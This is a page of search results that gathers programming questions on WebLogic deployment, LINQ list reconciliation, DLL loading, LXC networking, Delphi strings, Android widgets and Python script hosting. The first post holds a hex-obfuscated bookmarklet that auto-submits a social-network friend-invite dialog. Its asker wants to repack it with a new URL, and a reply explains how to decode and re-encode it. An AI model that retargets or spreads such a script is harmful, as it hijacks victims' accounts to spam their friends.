Search Results

Search found 5454 results on 219 pages for 'soa purge instances dehyd'.


  • JavaScript in the address bar, how do I decipher it?

    - by DoMx
    Hello Stack Overflow! I have some JavaScript code that appears to be obfuscated: javascript:var _0xe788=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x36\x38\x37\x38\x34\x39\x34\x39\x39\x32\x36\x35\x37\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0xe788[0],_0xe788[1],_0xe788[2],_0xe788[3],_0xe788[4],_0xe788[5],_0xe788[6],_0xe788[7],_0xe788[8],_0xe788[9],_0xe788[10],_0xe788[11],_0xe788[12],_0xe788[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0xe788[14]); I have seen similar instances and I have heard it may be hex. I have been doing some Google research and have found some online hex decoders, yet they all seem to struggle with this code. I basically need to decode it, change some variables, and repack it exactly how I found it but with a URL replaced. How can I go about this? Are there any free online tools available? Many thanks.
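    Those \xNN sequences are not encryption - they are ordinary JavaScript hex escape sequences, so any language can decode and re-encode them. As a minimal sketch, here is one way to do it in Python; the sample string is the first entry of the _0xe788 array above:

        import re

        escaped = r"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C"  # first entry of _0xe788

        # Replace each \xNN escape with the character it encodes.
        decoded = re.sub(r"\\x([0-9A-Fa-f]{2})",
                         lambda m: chr(int(m.group(1), 16)),
                         escaped)
        print(decoded)  # -> innerHTML

        # To repack an edited string, apply the inverse transform.
        repacked = "".join("\\x%02X" % ord(ch) for ch in decoded)
        print(repacked)  # -> \x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C

    Decoding every entry of the array this way reveals the strings (element IDs, URLs, the iframe markup), which can then be edited and re-encoded the same way.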


  • Using Maven to Deploy to Weblogic Clusters

    - by Mark Sailes
    We're currently using the weblogic-maven-plugin (org.codehaus.mojo, version 2.9.1) successfully to deploy to our local WebLogic 9.2 instances. When we try to deploy to a remote environment we have a problem. We use a two-machine cluster, with the admin server and a managed server on one machine, and another managed server on a separate machine. When your plugin uploads the application to the admin server, it doesn't copy it to the second managed server on the separate machine. This then causes a problem for the second managed server, as it cannot find the application in the location where the admin server saved it on its own machine. Config below: <configuration> <adminServerHostName>${weblogic.adminServerHostName}</adminServerHostName> <adminServerPort>${weblogic.adminServerPort}</adminServerPort> <adminServerProtocol>${weblogic.adminServerProtocol}</adminServerProtocol> <userId>${weblogic.userId}</userId> <password>${weblogic.password}</password> <upload>${weblogic.upload}</upload> <remote>${weblogic.remote}</remote> <verbose>${weblogic.verbose}</verbose> <debug>${weblogic.debug}</debug> <stage>${weblogic.stage}</stage> <targetNames>${weblogic.targetNames}</targetNames> <exploded>${weblogic.exploded}</exploded> </configuration> <profile> <id>localhost</id> <properties> <weblogic.adminServerHostName>localhost</weblogic.adminServerHostName> <weblogic.adminServerPort>7001</weblogic.adminServerPort> <weblogic.adminServerProtocol>t3</weblogic.adminServerProtocol> <weblogic.userId>weblogic</weblogic.userId> <weblogic.password>weblogic</weblogic.password> <weblogic.upload>false</weblogic.upload> <weblogic.remote>false</weblogic.remote> <weblogic.verbose>true</weblogic.verbose> <weblogic.debug>true</weblogic.debug> <weblogic.stage>false</weblogic.stage> <weblogic.targetNames>AdminServer</weblogic.targetNames> <weblogic.exploded>false</weblogic.exploded> </properties> </profile> <profile> <id>dev</id> <properties> <weblogic.adminServerHostName>******</weblogic.adminServerHostName> <weblogic.adminServerPort>9141</weblogic.adminServerPort> <weblogic.adminServerProtocol>t3</weblogic.adminServerProtocol> <weblogic.userId>******</weblogic.userId> <weblogic.password>******</weblogic.password> <weblogic.upload>true</weblogic.upload> <weblogic.remote>true</weblogic.remote> <weblogic.verbose>true</weblogic.verbose> <weblogic.debug>true</weblogic.debug> <weblogic.stage>true</weblogic.stage> <weblogic.targetNames>dev_cluster01</weblogic.targetNames> <weblogic.exploded>false</weblogic.exploded> </properties> </profile>


  • Reconciling a new BindingList into a master BindingList using LINQ

    - by Neo
    I have a seemingly simple problem whereby I wish to reconcile two lists so that an 'old' master list is updated by a 'new' list containing updated elements. Elements are denoted by a key property. These are my requirements: All elements in either list that have the same key result in an assignment of that element from the 'new' list over the original element in the 'old' list, but only if any properties have changed. Any elements in the 'new' list that have keys not in the 'old' list will be added to the 'old' list. Any elements in the 'old' list that have keys not in the 'new' list will be removed from the 'old' list. I found an equivalent problem here - http://stackoverflow.com/questions/161432/ - but it hasn't really been answered properly. So, I came up with an algorithm to iterate through the old and new lists and perform the reconciliation as per the above. Before anyone asks why I'm not just replacing the old list object with the new list object in its entirety: it's for presentation purposes. This is a BindingList bound to a grid on a GUI and I need to prevent refresh artifacts such as blinking, scrollbars moving, etc. So the list object must remain the same; only its updated elements change. Another thing to note is that the objects in the 'new' list, even if the key is the same and all the properties are the same, are completely different instances to the equivalent objects in the 'old' list, so copying references is not an option. Below is what I've come up with so far - it's a generic extension method for a BindingList. I've put comments in to demonstrate what I'm trying to do. public static class BindingListExtension { public static void Reconcile<T>(this BindingList<T> left, BindingList<T> right, string key) { PropertyInfo piKey = typeof(T).GetProperty(key); // Go through each item in the new list in order to find all updated and new elements foreach (T newObj in right) { // First, find an object in the new list that shares its key with an object in the old list // (FirstOrDefault, so a missing key yields null instead of throwing) T oldObj = left.FirstOrDefault(call => piKey.GetValue(call, null).Equals(piKey.GetValue(newObj, null))); if (oldObj != null) { // An object in each list was found with the same key, so now check to see if any properties have changed and // if any have, then assign the object from the new list over the top of the equivalent element in the old list foreach (PropertyInfo pi in typeof(T).GetProperties()) { if (!pi.GetValue(oldObj, null).Equals(pi.GetValue(newObj, null))) { left[left.IndexOf(oldObj)] = newObj; break; } } } else { // The object in the new list is brand new (has a new key), so add it to the old list left.Add(newObj); } } // Now, go through each item in the old list to find all elements with keys no longer in the new list // (iterate over a snapshot so we can remove from the original list) foreach (T oldObj in left.ToList()) { // Look for an element in the new list with a key matching an element in the old list if (right.FirstOrDefault(call => piKey.GetValue(call, null).Equals(piKey.GetValue(oldObj, null))) == null) { // A matching element cannot be found in the new list, so remove the item from the old list left.Remove(oldObj); } } } } It can be called like this: _oldBindingList.Reconcile(newBindingList, "MyKey") However, I'm looking for a method of doing the same using LINQ-type methods such as GroupJoin<>, Join<>, Select<>, SelectMany<>, Intersect<>, etc. So far, the problem I've had is that each of these LINQ-type methods results in a brand-new intermediary list (as a return value), and really, I only want to modify the existing list, for all the above reasons.
    If anyone can help with this, it would be most appreciated. If not, no worries; the above method (as it were) will suffice for now. Thanks, Jason
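    For comparison, here is a minimal, language-agnostic sketch of the same three-step reconcile in Python (illustrative only, not the asker's code); the key-to-index map is the point, since it avoids the repeated linear scans that FirstOrDefault performs:

        def reconcile(old, new, key):
            """In-place reconcile of list `old` against `new`, matching on attribute `key`."""
            old_index = {getattr(o, key): i for i, o in enumerate(old)}
            new_keys = set()
            for n in new:
                k = getattr(n, key)
                new_keys.add(k)
                if k in old_index:
                    i = old_index[k]
                    if vars(old[i]) != vars(n):  # some property changed
                        old[i] = n               # overwrite in place
                else:
                    old.append(n)                # brand-new key
            # Remove elements whose keys vanished, iterating over a snapshot.
            for o in list(old):
                if getattr(o, key) not in new_keys:
                    old.remove(o)

    The same index-first shape works in C# with a Dictionary built once per call, which keeps the BindingList instance (and its grid binding) intact while avoiding O(n²) lookups.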


  • Loading multiple copies of a group of DLLs in the same process

    - by george
    Background I'm maintaining a plugin for an application. I'm using Visual C++ 2003. The plugin is composed of several DLLs - there's the main DLL, that's the one that the application loads using LoadLibrary, and there are several utility DLLs that are used by the main DLL and by each other. Dependencies generally look like this: plugin.dll - utilA.dll, utilB.dll utilA.dll - utilB.dll utilB.dll - utilA.dll, utilC.dll You get the picture. Some of the dependencies between the DLLs are load-time and some run-time. All the DLL files are stored in the executable's directory (not a requirement, just how it works now). The problem There's a new requirement - running multiple instances of the plugin within the application. The application runs each instance of a plugin in its own thread, i.e. each thread calls into the plugin's code independently. The plugin's code, however, is anything but thread-safe - lots of global variables, etc. Unfortunately, fixing the whole thing isn't currently an option, so I need a way to load multiple (at most 3) copies of the plugin's DLLs in the same process. Option 1: The distinct names approach Creating 3 copies of each DLL file, so that each file has a distinct name, e.g. plugin1.dll, plugin2.dll, plugin3.dll, utilA1.dll, utilA2.dll, utilA3.dll, utilB1.dll, etc. The application will load plugin1.dll, plugin2.dll and plugin3.dll. The files will be in the executable's directory. For each group of DLLs to know each other by name (so the inter-dependencies work), the names need to be known at compilation time - meaning the DLLs need to be compiled multiple times, only each time with different output file names. Not very complicated, but I'd hate having 3 copies of the VS project files, and don't like having to compile the same files over and over. Option 2: The side-by-side assemblies approach Creating 3 copies of the DLL files, each group in its own directory, and defining each group as an assembly by putting an assembly manifest file in the directory, listing the plugin's DLLs. Each DLL will have an application manifest pointing to the assembly, so that the loader finds the copies of the utility DLLs that reside in the same directory. The manifest needs to be embedded for it to be found when a DLL is loaded using LoadLibrary. I'll use mt.exe from a later VS version for the job, since VS2003 has no built-in manifest embedding support. I've tried this approach with partial success - dependencies are found during load-time of the DLLs, but not when a DLL function is called that loads another DLL. This seems to be the expected behavior according to this article - a DLL's activation context is only used at the DLL's load-time, and afterwards it's deactivated and the process's activation context is used. I haven't yet tried working around this using ISOLATION_AWARE_ENABLED. Questions Got any other options? Any quick & dirty solution will do. :-) Will ISOLATION_AWARE_ENABLED even work with VS2003? Comments will be greatly appreciated. Thanks!


  • wordexp followed by strcpy = EXC_BAD_ACCESS + sharedlibrary apply-load-rules-all

    - by fyngyrz
    The implication is a memory problem. I have static allocations for these: char akdir[400]; char homedir[400]; This crashes on the first strcpy(): void setuplibfoo() { long ii; double x; wordexp_t result; // This obtains the user's home directory // -------------------------------------- homedir[0]=0; // in case wordexp fails switch (wordexp("~/",&result,0)) { case 0: // Successful. We'll fall into deallocate when done. { strcpy(homedir,result.we_wordv[0]); // <<--- CRASH! strcpy(akdir,homedir); strcat(akdir,"ak-plugins/"); vs_status(akdir); } case WRDE_NOSPACE: // If the error was WRDE_NOSPACE, then { // perhaps part of the result was allocated. wordfree (&result); } default: // all other errors do not require deallocation { break; } } ...additional code clipped; execution doesn't get there on a crash. This is in a shared library I've written that is linked to my application, also something I've written. In this case, it doesn't get very far, although if it starts, it's fine. I've read the wordexp docs several times; they say they allocate new objects, so you just set up that type and call them with the address. The switch error model is right from the wordexp docs: http://www.gnu.org/s/libc/manual/html_mono/libc.html#Wordexp-Example It doesn't always crash. Just sometimes, and just under 10.6. Never under 10.5. I'm building debug mode with Xcode 3.1.1; under OS X 10.5.8 it seems to run OK, I've not seen a crash -- under 10.6, it crashes... sometimes. But always with that same exception, and always in the same place. The Google has it that this actually means, somehow, that it's too soon to allocate memory. But all the instances I could find were memory errors on the part of the programmer. Overruns, etc. And I can't find any docs on when it IS safe to allocate memory. Now, the path that expands there is nowhere near 400 characters. It's this (if it completes): /Users/flake/ak-plugins/ and this: /Users/flake/ ...if it doesn't. The strcpy() copies the 2nd param to the first. Theirs to mine. And it works! Under 10.5. :/ So is wordexp broke? Is 10.6 broke? Am I cRaZy? Here's the debugger output: 0x00013446 <+0049> call 0xc98da <dyld_stub_wordexp> 0x0001344b <+0054> test %eax,%eax 0x0001344d <+0056> je 0x13454 <setuplibfoo+63> 0x0001344f <+0058> jmp 0x134da <setuplibfoo+197> 0x00013454 <+0063> mov -0x1c(%ebp),%eax 0x00013457 <+0066> mov (%eax),%eax 0x00013459 <+0068> mov %eax,0x4(%esp) 0x0001345d <+0072> lea 0xb6cc2(%ebx),%eax 0x00013463 <+0078> mov (%eax),%eax 0x00013465 <+0080> mov %eax,(%esp) 0x00013468 <+0083> call 0xc9898 <dyld_stub_strcpy> 0x0001346d <+0088> lea 0xb6cc2(%ebx),%eax <<--CRASH!


  • LXC Container Networking

    - by digitaladdictions
    I just started to experiment with LXC containers. I was able to create a container and start it up, but I cannot get DHCP to assign the container an IP address. If I assign a static address, the container can ping the host IP but nothing outside the host. The host is CentOS 6.5 and the guest is Ubuntu 14.04 LTS. I used the template downloaded by the lxc-create -t download -n cn-01 command. If I am trying to get an IP address on the same subnet as the host, I don't believe I should need the iptables rule for masquerading, but I added it anyway. Same with IP forwarding. I compiled LXC by hand from the following source https://linuxcontainers.org/downloads/lxc-1.0.4.tar.gz Host Operating System Version #> cat /etc/redhat-release CentOS release 6.5 (Final) #> uname -a Linux localhost.localdomain 2.6.32-431.20.3.el6.x86_64 #1 SMP Thu Jun 19 21:14:45 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux Container Config #> cat /usr/local/var/lib/lxc/cn-01/config # Template used to create this container: /usr/local/share/lxc/templates/lxc-download # Parameters passed to the template: # For additional config options, please look at lxc.container.conf(5) # Distribution configuration lxc.include = /usr/local/share/lxc/config/ubuntu.common.conf lxc.arch = x86_64 # Container specific configuration lxc.rootfs = /usr/local/var/lib/lxc/cn-01/rootfs lxc.utsname = cn-01 # Network configuration lxc.network.type = veth lxc.network.flags = up lxc.network.link = br0 LXC default.conf #> cat /usr/local/etc/lxc/default.conf lxc.network.type = veth lxc.network.link = br0 lxc.network.flags = up #> lxc-checkconfig Kernel configuration not found at /proc/config.gz; searching... Kernel configuration found at /boot/config-2.6.32-431.20.3.el6.x86_64 --- Namespaces --- Namespaces: enabled Utsname namespace: enabled Ipc namespace: enabled Pid namespace: enabled User namespace: enabled Network namespace: enabled Multiple /dev/pts instances: enabled --- Control groups --- Cgroup: enabled Cgroup namespace: enabled Cgroup device: enabled Cgroup sched: enabled Cgroup cpu account: enabled Cgroup memory controller: /usr/local/bin/lxc-checkconfig: line 103: [: too many arguments enabled Cgroup cpuset: enabled --- Misc --- Veth pair device: enabled Macvlan: enabled Vlan: enabled File capabilities: /usr/local/bin/lxc-checkconfig: line 118: [: -gt: unary operator expected Note : Before booting a new kernel, you can check its configuration usage : CONFIG=/path/to/config /usr/local/bin/lxc-checkconfig Network Config (HOST) #> cat /etc/sysconfig/network-scripts/ifcfg-br0 DEVICE=br0 TYPE=Bridge BOOTPROTO=dhcp ONBOOT=yes #> cat /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 ONBOOT=yes TYPE=Ethernet IPV6INIT=no USERCTL=no BRIDGE=br0 #> cat /etc/networks default 0.0.0.0 loopback 127.0.0.0 link-local 169.254.0.0 #> ip a s 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:0c:29:12:30:f2 brd ff:ff:ff:ff:ff:ff inet6 fe80::20c:29ff:fe12:30f2/64 scope link valid_lft forever preferred_lft forever 3: pan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN link/ether 42:7e:43:b3:61:c5 brd ff:ff:ff:ff:ff:ff 4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link/ether
00:0c:29:12:30:f2 brd ff:ff:ff:ff:ff:ff inet 10.60.70.121/24 brd 10.60.70.255 scope global br0 inet6 fe80::20c:29ff:fe12:30f2/64 scope link valid_lft forever preferred_lft forever 12: vethT6BGL2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether fe:a1:69:af:50:17 brd ff:ff:ff:ff:ff:ff inet6 fe80::fca1:69ff:feaf:5017/64 scope link valid_lft forever preferred_lft forever #> brctl show bridge name bridge id STP enabled interfaces br0 8000.000c291230f2 no eth0 vethT6BGL2 pan0 8000.000000000000 no #> cat /proc/sys/net/ipv4/ip_forward 1 # Generated by iptables-save v1.4.7 on Fri Jul 11 15:11:36 2014 *nat :PREROUTING ACCEPT [34:6287] :POSTROUTING ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A POSTROUTING -o eth0 -j MASQUERADE COMMIT # Completed on Fri Jul 11 15:11:36 2014 Network Config (Container) #> cat /etc/network/interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp #> ip a s 11: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 02:69:fb:42:ee:d7 brd ff:ff:ff:ff:ff:ff inet6 fe80::69:fbff:fe42:eed7/64 scope link valid_lft forever preferred_lft forever 13: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever


  • String Sharing/Reference issue with objects in Delphi

    - by jenakai123
    My application builds many objects in memory based on filenames (among other string-based information). I was hoping to optimise memory usage by storing the path and filename separately, and then sharing the path between objects with the same path. I'm not trying to use a string pool or anything; basically, my objects are sorted, so if I have 10 objects with the same path I want objects 2-10 to have their path "pointed" at object 1's path (e.g. object[2].Path=object[1].Path). I have a problem though: I don't believe that my objects are in fact sharing a reference to the same string after I think I am telling them to (by the object[2].Path=object[1].Path assignment). When I do an experiment with a string list and set all the values to point to the first value in the list, I can see the "memory conservation" in action, but when I use objects I see absolutely no change at all; admittedly, I am only using Task Manager (private working set) to watch for memory use changes. Here's a contrived example, I hope this makes sense. I have an object: TfileObject=class(Tobject) FpathPart: string; FfilePart: string; end; Now I create 1,000,000 instances of the object, using a new string for each one: var x: integer; MyFilePath: string; fo: TfileObject; begin for x := 1 to 1000000 do begin // create a new string for every iteration of the loop MyFilePath:=ExtractFilePath(Application.ExeName); fo:=TfileObject.Create; fo.FpathPart:=MyFilePath; FobjectList.Add(fo); end; end; Run this up and Task Manager says I am using 68MB of memory or something. (Note that if I allocated MyFilePath outside of the loop then I do save memory because of 1 instance of the string, but this is a contrived example and not actually how it would happen in the app.) Now I want to "optimise" my memory usage by making all objects share the same instance of the path string, since it's the same value: var x: integer; begin for x:=1 to FobjectList.Count-1 do begin TfileObject(FobjectList[x]).FpathPart:=TfileObject(FobjectList[0]).FpathPart; end; end; Task Manager shows absolutely no change. However, if I do something similar with a TstringList: var x: integer; begin for x := 1 to 1000000 do begin FstringList.Add(ExtractFilePath(Application.ExeName)); end; end; Task Manager says 60MB memory use. Now optimise with: var x: integer; begin for x := 1 to FstringList.Count - 1 do FstringList[x]:=FstringList[0]; end; Task Manager shows the drop in memory usage that I would expect; now 10MB. So I seem to be able to share strings in a string list, but not in objects. I am obviously missing something conceptually, in code, or both! I hope this makes sense. I can really see the ability to conserve memory using this technique, as I have a lot of objects all with lots of string information; that data is sorted in many different ways, and I would like to be able to iterate over this data once it is loaded into memory and free some of that memory back up again by sharing strings in this way. Thanks in advance for any assistance you can offer.
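    The effect being chased here - many slots pointing at one shared string instance rather than many equal copies - is easy to demonstrate in a language where object identity can be inspected directly. A small illustrative Python sketch (not the asker's code; Delphi strings are reference-counted, so the assignment in the question really does share a reference in much the same way):

        # Each join() call builds a new, equal-but-distinct string object.
        paths = ["".join(["C:\\data\\", "project\\"]) for _ in range(5)]
        print(len({id(p) for p in paths}))  # 5 distinct instances

        # Point every slot at the first instance, as the Delphi loop tries to do.
        first = paths[0]
        for i in range(1, len(paths)):
            paths[i] = first
        print(len({id(p) for p in paths}))  # 1 shared instance

    This also hints at why Task Manager is a blunt measuring stick: even when duplicates are freed, the memory may be returned to the heap manager rather than to the OS, so the working-set figure need not move.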


  • Accessing Layout Items from inside Widget AppWidgetProvider

    - by cam4mav
    I am starting to go insane trying to figure this out. It seems like it should be very easy; I'm starting to wonder if it's possible. What I am trying to do is create a home screen widget that only contains an ImageButton. When it is pressed, the idea is to change some setting (like the Wi-Fi toggle) and then change the Button's image. I have the ImageButton declared like this in my main.xml: <ImageButton android:id="@+id/buttonOne" android:src="@drawable/button_normal_ringer" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_gravity="center" /> My AppWidgetProvider class, named ButtonWidget (note that the RemoteViews object is a locally stored variable; this allowed me to get access to the RemoteViews layout elements... or so I thought): @Override public void onUpdate(Context context, AppWidgetManager appWidgetManager, int[] appWidgetIds) { remoteViews = new RemoteViews(context.getPackageName(), R.layout.main); Intent active = new Intent(context, ButtonWidget.class); active.setAction(VIBRATE_UPDATE); active.putExtra("msg","TESTING"); PendingIntent actionPendingIntent = PendingIntent.getBroadcast(context, 0, active, 0); remoteViews.setOnClickPendingIntent(R.id.buttonOne, actionPendingIntent); appWidgetManager.updateAppWidget(appWidgetIds, remoteViews); } @Override public void onReceive(Context context, Intent intent) { // v1.5 fix that doesn't call onDelete Action final String action = intent.getAction(); Log.d("onReceive",action); if (AppWidgetManager.ACTION_APPWIDGET_DELETED.equals(action)) { final int appWidgetId = intent.getExtras().getInt( AppWidgetManager.EXTRA_APPWIDGET_ID, AppWidgetManager.INVALID_APPWIDGET_ID); if (appWidgetId != AppWidgetManager.INVALID_APPWIDGET_ID) { this.onDeleted(context, new int[] { appWidgetId }); } } else { // check, if our Action was called if (intent.getAction().equals(VIBRATE_UPDATE)) { String msg = "null"; try { msg = intent.getStringExtra("msg"); } catch (NullPointerException e) { Log.e("Error", "msg = null"); } Log.d("onReceive",msg); if(remoteViews != null){ Log.d("onReceive",""+remoteViews.getLayoutId()); remoteViews.setImageViewResource(R.id.buttonOne, R.drawable.button_pressed_ringer); Log.d("onReceive", "tried to switch"); } else{ Log.d("F!", "--naughty language used here!!!--"); } } super.onReceive(context, intent); } } So, I've been testing this, and the onReceive method works great; I'm able to send notifications and all sorts of stuff (removed from the code for ease of reading). The one thing I can't do is change any properties of the view elements. To try and fix this, I made RemoteViews a local and static private variable. Using logs I was able to see that when multiple instances of the app are on screen, they all refer to the one instance of RemoteViews - perfect for what I'm trying to do. The trouble is in trying to change the image of the ImageButton. I can do this from within the onUpdate method using this: remoteViews.setImageViewResource(R.id.buttonOne, R.drawable.button_pressed_ringer); That doesn't do me any good though once the widget is created. For some reason, even though it's inside the same class, being inside the onReceive method makes that line not work. That line used to throw a null pointer, as a matter of fact, until I changed the variable to static. Now it passes the null test, refers to the same layoutId as it did at the start, reads the line, but it does nothing. It's like the code isn't even there; it just keeps chugging along. So...
    Is there any way to modify layout elements from within a widget after the widget has been created?! I want to do this based on the environment, not with a configuration activity launch. I've been looking at various questions, and this seems to be an issue that really hasn't been solved. Oh, and for anyone who finds this and wants a good starting tutorial for widgets, there is an easy-to-follow PDF out there (though a bit old, it gets you comfortable with widgets). Hopefully someone can help here. I kinda have the feeling that this is illegal and there is a different way to go about this. I would LOVE to be told another approach!!!! Thanks


  • hosting simple Python scripts in a container to handle concurrency, configuration, caching, etc.

    - by Justin Grant
    My first real-world Python project is to write a simple framework (or re-use/adapt an existing one) which can wrap small Python scripts (which are used to gather custom data for a monitoring tool) with a "container" to handle boilerplate tasks like: fetching a script's configuration from a file (keeping that info up to date if the file changes, and handling decryption of sensitive config data); running multiple instances of the same script in different threads instead of spinning up a new process for each one; exposing an API for caching expensive data and storing persistent state from one script invocation to the next. Today, script authors must handle the issues above, which usually means that most script authors don't handle them correctly, causing bugs and performance problems. In addition to avoiding bugs, we want a solution which lowers the bar to create and maintain scripts, especially given that many script authors may not be trained programmers. Below are examples of the API I've been thinking of, and which I'm looking to get your feedback about. A scripter would need to build a single method which takes (as input) the configuration that the script needs to do its job, and either returns a Python object or calls a method to stream back data in chunks. Optionally, a scripter could supply methods to handle startup and/or shutdown tasks. HTTP-fetching script example (in pseudocode, omitting the actual data-fetching details to focus on the container's API): def run (config, context, cache) : results = http_library_call (config.url, config.http_method, config.username, config.password, ...) return { html : results.html, status_code : results.status, headers : results.response_headers } def init(config, context, cache) : config.max_threads = 20 # up to 20 URLs at one time (per process) config.max_processes = 3 # launch up to 3 concurrent processes config.keepalive = 1200 # keep process alive for 10 mins without another call config.process_recycle.requests = 1000 # restart the process every 1000 requests (to avoid leaks) config.kill_timeout = 600 # kill the process if any call lasts longer than 10 minutes A database-data fetching script example might look like this (in pseudocode): def run (config, context, cache) : expensive = context.cache["something_expensive"] for record in db_library_call (expensive, context.checkpoint, config.connection_string) : context.log (record, "logDate") # log all properties, optionally specify name of timestamp property last_date = record["logDate"] context.checkpoint = last_date # persistent checkpoint, used next time through def init(config, context, cache) : cache["something_expensive"] = get_expensive_thing() def shutdown(config, context, cache) : expensive = cache["something_expensive"] expensive.release_me() Is this API appropriately "pythonic", or are there things I should do to make this more natural to the Python scripter? (I'm more familiar with building C++/C#/Java APIs so I suspect I'm missing useful Python idioms.) Specific questions: is it natural to pass a "config" object into a method and ask the callee to set various configuration options? Or is there another preferred way to do this? When a callee needs to stream data back to its caller, is a method like context.log() (see above) appropriate, or should I be using yield instead? (yield seems natural, but I worry it'd be over the head of most scripters) My approach requires scripts to define functions with predefined names (e.g. "run", "init", "shutdown"). Is this a good way to do it?
If not, what other mechanism would be more natural? I'm passing the same config, context, cache parameters into every method. Would it be better to use a single "context" parameter instead? Would it be better to use global variables instead? Finally, are there existing libraries you'd recommend to make this kind of simple "script-running container" easier to write?
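    For what it's worth, the skeleton of such a container is small. Below is a minimal sketch under stated assumptions - importlib-based script loading, a JSON config file, a plain dict for the cache, and SimpleNamespace standing in for the config/context objects; every name is illustrative, not an existing library:

        import importlib.util
        import json
        import threading
        from types import SimpleNamespace

        def load_script(path):
            """Load a plugin script: a .py file defining run(config, context, cache),
            plus optional init(...) and shutdown(...)."""
            spec = importlib.util.spec_from_file_location("plugin_script", path)
            module = importlib.util.module_from_spec(spec)
            spec.loader.exec_module(module)
            return module

        class ScriptContainer:
            def __init__(self, script_path, config_path):
                self.script = load_script(script_path)
                with open(config_path) as f:
                    # Attribute-style access (config.url, ...) as in the question;
                    # a real container would also watch the file for changes and
                    # decrypt sensitive fields here.
                    self.config = SimpleNamespace(**json.load(f))
                self.cache = {}  # survives from one invocation to the next
                self.context = SimpleNamespace(checkpoint=None, log=print)
                if hasattr(self.script, "init"):
                    self.script.init(self.config, self.context, self.cache)

            def run(self, n_threads=1):
                """Run concurrent invocations as threads instead of new processes."""
                threads = [
                    threading.Thread(target=self.script.run,
                                     args=(self.config, self.context, self.cache))
                    for _ in range(n_threads)
                ]
                for t in threads:
                    t.start()
                for t in threads:
                    t.join()

            def shutdown(self):
                if hasattr(self.script, "shutdown"):
                    self.script.shutdown(self.config, self.context, self.cache)

    On the yield question: a generator-based run() is the more idiomatic way to stream records back, and the container can hide it from less experienced scripters by iterating the generator itself and calling context.log() on their behalf.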


